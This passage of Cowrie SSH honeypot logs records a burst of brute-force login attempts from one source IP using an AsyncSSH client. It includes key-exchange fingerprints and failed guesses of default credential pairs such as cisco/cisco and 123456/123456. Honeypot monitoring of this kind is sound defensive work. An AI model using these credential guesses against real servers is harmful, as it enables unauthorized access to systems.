@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:57.743846Z","src_ip":"212.227.235.229","session":"393c138e28d2"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:58.174011Z","src_ip":"212.227.235.229","session":"93957167a05f"}
{"eventid":"cowrie.login.failed","username":"carol","password":"carol","message":"login attempt [carol/carol] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:58.750602Z","src_ip":"212.227.235.229","session":"393c138e28d2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:00.184067Z","src_ip":"212.227.235.229","session":"393c138e28d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57194,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c65edf8c249","protocol":"ssh","message":"New connection: 212.227.235.229:57194 (1.2.3.4:22) [session: 7c65edf8c249]","sensor":"my-vps","timestamp":"2025-08-28T08:08:06.845889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:06.849073Z","src_ip":"212.227.235.229","session":"7c65edf8c249"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:07.109513Z","src_ip":"212.227.235.229","session":"7c65edf8c249"}
{"eventid":"cowrie.login.failed","username":"tushar","password":"tushar123","message":"login attempt [tushar/tushar123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:10.691570Z","src_ip":"212.227.235.229","session":"7c65edf8c249"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:11.970982Z","src_ip":"212.227.235.229","session":"7c65edf8c249"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59434,"dst_ip":"1.2.3.4","dst_port":22,"session":"56c146f4683b","protocol":"ssh","message":"New connection: 212.227.235.229:59434 (1.2.3.4:22) [session: 56c146f4683b]","sensor":"my-vps","timestamp":"2025-08-28T08:08:13.229451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:13.474165Z","src_ip":"212.227.235.229","session":"56c146f4683b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59316,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2ffe9526bc6","protocol":"ssh","message":"New connection: 212.227.235.229:59316 (1.2.3.4:22) [session: e2ffe9526bc6]","sensor":"my-vps","timestamp":"2025-08-28T08:08:13.769640Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59446,"dst_ip":"1.2.3.4","dst_port":22,"session":"28d36257a912","protocol":"ssh","message":"New connection: 212.227.235.229:59446 (1.2.3.4:22) [session: 28d36257a912]","sensor":"my-vps","timestamp":"2025-08-28T08:08:13.820353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:13.821041Z","src_ip":"212.227.235.229","session":"28d36257a912"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:14.076243Z","src_ip":"212.227.235.229","session":"28d36257a912"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:14.282871Z","src_ip":"212.227.235.229","session":"e2ffe9526bc6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:14.345035Z","src_ip":"212.227.235.229","session":"e2ffe9526bc6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:15.042405Z","src_ip":"212.227.235.229","session":"56c146f4683b"}
{"eventid":"cowrie.login.failed","username":"testftp","password":"testftp","message":"login attempt [testftp/testftp] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:15.112708Z","src_ip":"212.227.235.229","session":"28d36257a912"}
{"eventid":"cowrie.login.failed","username":"user100","password":"user100","message":"login attempt [user100/user100] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:15.812238Z","src_ip":"212.227.235.229","session":"e2ffe9526bc6"}
{"eventid":"cowrie.login.failed","username":"123456","password":"123456","message":"login attempt [123456/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:16.066777Z","src_ip":"212.227.235.229","session":"56c146f4683b"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:16.952187Z","src_ip":"212.227.235.229","session":"28d36257a912"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:17.129810Z","src_ip":"212.227.235.229","session":"e2ffe9526bc6"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:17.654552Z","src_ip":"212.227.235.229","session":"56c146f4683b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59322,"dst_ip":"1.2.3.4","dst_port":22,"session":"249fe9836f29","protocol":"ssh","message":"New connection: 212.227.235.229:59322 (1.2.3.4:22) [session: 249fe9836f29]","sensor":"my-vps","timestamp":"2025-08-28T08:08:18.322562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:18.325109Z","src_ip":"212.227.235.229","session":"249fe9836f29"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:18.631535Z","src_ip":"212.227.235.229","session":"249fe9836f29"}
{"eventid":"cowrie.login.failed","username":"mms","password":"mms","message":"login attempt [mms/mms] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:21.477001Z","src_ip":"212.227.235.229","session":"249fe9836f29"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:22.724892Z","src_ip":"212.227.235.229","session":"249fe9836f29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50282,"dst_ip":"1.2.3.4","dst_port":22,"session":"81378068aa04","protocol":"ssh","message":"New connection: 212.227.235.229:50282 (1.2.3.4:22) [session: 81378068aa04]","sensor":"my-vps","timestamp":"2025-08-28T08:08:22.848101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:22.849342Z","src_ip":"212.227.235.229","session":"81378068aa04"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:23.467136Z","src_ip":"212.227.235.229","session":"81378068aa04"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:26.848630Z","src_ip":"212.227.235.229","session":"81378068aa04"}
